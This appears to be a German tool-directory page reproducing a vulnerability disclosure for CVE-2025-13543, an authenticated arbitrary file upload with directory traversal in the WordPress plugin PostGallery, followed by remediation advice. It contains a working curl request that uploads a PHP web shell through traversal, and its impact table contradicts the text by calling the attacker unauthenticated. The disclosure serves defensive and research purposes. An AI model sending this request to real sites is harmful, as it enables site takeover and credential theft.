Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PostGallery-CVE-Report — Offenlegung für CVE-2025-13543 | Kitploit
Tools/GitHubGitHub/mooseloveti/postgallery-cve-report
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmooseloveti/postgallery-cve-report

PostGallery-CVE-Report

Offenlegung für CVE-2025-13543

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PostGallery-CVE-Report

Offenlegung für CVE-2025-13543

CVE-2025-13543 - Schwachstelle in PostGallery

Dieses Repository legt eine Schwachstelle offen, die im PostGallery <= 1.12.5, einem WordPress-Plugin, entwickelt von rtowebsites, entdeckt wurde.

🛠 Betroffene Version

  • Produkt: PostGallery
  • Version: <= 1.12.5
  • URL: https://wordpress.org/plugins/postgallery/

🔒 Zugewiesene CVE

CVE-IDTypKomponenteAuswirkung
CVE-2025-13543Authentifizierter (Abonnent+) Beliebiger Datei-Uploadlib/ajax-actions/imageUpload.php  admin/PostGalleryUploader.phpNicht authentifizierter Angreifer kann beliebige Datei hochladen

🧾 Detaillierte Beschreibung

CVE-2025-13543 — Authentifizierter (Abonnent+) Beliebiger Datei-Upload

  • Betroffene Komponente: PostGallery AJAX-Upload-Handler (postgalleryAjaxUpload) und PostGalleryUploader-Backend
  • Angriffsvektor: Authentifizierter (Abonnent+) Beliebiger Datei-Upload via Directory Traversal.
  • Auslöser: Jeder authentifizierte Benutzer mit niedrigen Berechtigungen (z. B. ein Abonnent) kann beliebige PHP-Dateien über Directory Traversal in vom Angreifer kontrollierte Pfade hochladen.
root@kitploit:~
curl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
  -F "action=postgalleryAjaxUpload" \
  -F "postid=1" \
  -F "uploadFolder=../../../" \
  -F "name=shell.php" \
  -F "[email protected];type=application/x-php"
  • Auswirkung: Jeder authentifizierte Benutzer mit niedrigen Berechtigungen (z. B. ein Abonnent) kann über Directory Traversal beliebige PHP-Dateien in vom Angreifer kontrollierte Pfade hochladen. Dies ermöglicht die Ausführung von Remote-Code im Kontext des Webservers, was zur vollständigen Kompromittierung der Website führt, einschließlich Änderung von Website-Inhalten, Exfiltration von wp-config.php und Datenbank-Anmeldeinformationen, Bereitstellung persistenter Hintertüren und Erstellung von Schatten-Administratorkonten.

❓Grund für die Schwachstelle

  • In lib/ajax-actions/imageUpload.php sollte eine ordnungsgemäße Autorisierung erzwungen werden (z. B. current_user_can('upload_files') erfordern) und ein kryptografischer Nonce vor der Verarbeitung von Uploads validiert werden.
  • In admin/PostGalleryUploader.php sollte uploadFolder strikt auf ein bekanntes Unterverzeichnis von wp-content/uploads/gallery beschränkt werden, jeder Wert mit ../ oder absoluten Pfaden abgelehnt werden, und Pfade vor der Verwendung normalisiert werden.
  • Verwenden Sie die standardmäßigen WordPress-Upload-APIs wie wp_handle_upload() / wp_check_filetype_and_ext() und beschränken Sie Uploads auf eine Whitelist nicht ausführbarer Medientypen, wobei .php und andere ausführbare Erweiterungen in webzugänglichen Verzeichnissen explizit blockiert werden.

Anmerkung

Ich hätte nicht gedacht, dass eine so CTF-ähnliche Schwachstelle existiert. Allein ein beliebiger Datei-Upload ist schon schlimm, aber mit Directory Traversal ist es noch verzweifelter. Die Reproduktion der Schwachstelle hat viel Spaß gemacht.

🔍 Entdecker

Name: MooseLove
Rolle: Unabhängiger Sicherheitsforscher / Bug Hunter
Kontakt: Auf Anfrage erhältlich


📚 Referenzen

  • Produkt: https://wordpress.org/plugins/postgallery/

⚠️ Lizenz

Diese Beratung wird zur öffentlichen Sicherheitssensibilisierung bereitgestellt. Freie Weitergabe mit Namensnennung.

Tool herunterladen